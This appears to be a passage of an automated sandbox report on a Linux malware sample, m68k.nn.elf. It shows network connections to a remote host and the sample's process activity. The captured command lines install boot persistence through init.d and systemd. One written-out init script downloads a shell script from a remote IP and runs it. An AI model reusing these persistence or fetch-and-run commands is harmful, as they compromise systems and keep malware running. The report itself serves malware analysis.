Dec 1, 2024 15:23:55.628092051 CET | 199 | 38970 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.721858978 CET | 199 | 38972 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.744091034 CET | 199 | 38974 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.744139910 CET | 38974 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.752249956 CET | 38974 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.762110949 CET | 38974 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.764079094 CET | 199 | 38972 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.772022009 CET | 38976 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.872220993 CET | 199 | 38974 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.892165899 CET | 199 | 38976 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.892237902 CET | 38976 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.903733969 CET | 38976 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.906045914 CET | 38976 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.916670084 CET | 38978 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.928132057 CET | 199 | 38974 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.023746967 CET | 199 | 38976 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.036683083 CET | 199 | 38978 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.038124084 CET | 38978 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.068079948 CET | 199 | 38976 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.077033043 CET | 38978 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.080030918 CET | 38978 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.085789919 CET | 38980 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.196965933 CET | 199 | 38978 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.205888033 CET | 199 | 38980 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.205964088 CET | 38980 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.208729982 CET | 38980 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.240139008 CET | 199 | 38978 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.240540981 CET | 38980 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.329906940 CET | 199 | 38980 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.333302021 CET | 38982 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.404058933 CET | 199 | 38980 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.453330994 CET | 199 | 38982 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.454166889 CET | 38982 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.462965012 CET | 38982 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.463963985 CET | 38982 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.490446091 CET | 38984 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.582986116 CET | 199 | 38982 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.611259937 CET | 199 | 38984 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.611387014 CET | 38984 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.624087095 CET | 199 | 38982 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.701905966 CET | 38984 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.822134972 CET | 199 | 38984 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:56.822201967 CET | 38984 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:56.834026098 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 1, 2024 15:23:57.634865046 CET | 199 | 38968 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:57.634970903 CET | 38968 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:57.807634115 CET | 199 | 38970 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:57.807784081 CET | 38970 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:57.860745907 CET | 199 | 38972 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:57.860857010 CET | 38972 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:58.009819031 CET | 199 | 38974 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:58.009957075 CET | 38974 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:58.156589985 CET | 199 | 38976 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:58.156693935 CET | 38976 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:58.297489882 CET | 199 | 38978 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:58.297576904 CET | 38978 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:58.464749098 CET | 199 | 38980 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:58.465362072 CET | 38980 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:58.720031977 CET | 199 | 38982 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:58.720195055 CET | 38982 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:24:02.205466032 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 1, 2024 15:24:03.997266054 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 1, 2024 15:24:18.075418949 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 1, 2024 15:24:28.313842058 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 1, 2024 15:24:34.456955910 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 1, 2024 15:24:59.029699087 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 1, 2024 15:25:19.506725073 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
System Behavior
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | /tmp/m68k.nn.elf |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/systemctl |
Arguments: | systemctl enable custom.service |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x /etc/init.d/system |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/ln |
Arguments: | ln -s /etc/init.d/system /etc/rcS.d/S99system |
File size: | 76160 bytes |
MD5 hash: | e933cf05571f62c0157d4e2dfcaea282 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x /etc/init.d/m68k.nn.elf |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/mkdir |
Arguments: | mkdir -p /etc/rc.d |
File size: | 88408 bytes |
MD5 hash: | 088c9d1df5a28ed16c726eca15964cb7 |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/ln |
Arguments: | ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf |
File size: | 76160 bytes |
MD5 hash: | e933cf05571f62c0157d4e2dfcaea282 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/libexec/gnome-session-binary |
Arguments: | - |
File size: | 334664 bytes |
MD5 hash: | d9b90be4f7db60cb3c2d3da6a1d31bfb |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:54 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/libexec/gsd-housekeeping |
Arguments: | /usr/libexec/gsd-housekeeping |
File size: | 51840 bytes |
MD5 hash: | b55f3394a84976ddb92a2915e5d76914 |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/gdm3 |
Arguments: | - |
File size: | 453296 bytes |
MD5 hash: | 2492e2d8d34f9377e3e530a61a15674f |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /etc/gdm3/PrimeOff/Default |
Arguments: | /etc/gdm3/PrimeOff/Default |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/gdm3 |
Arguments: | - |
File size: | 453296 bytes |
MD5 hash: | 2492e2d8d34f9377e3e530a61a15674f |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /etc/gdm3/PrimeOff/Default |
Arguments: | /etc/gdm3/PrimeOff/Default |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 14:23:55 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |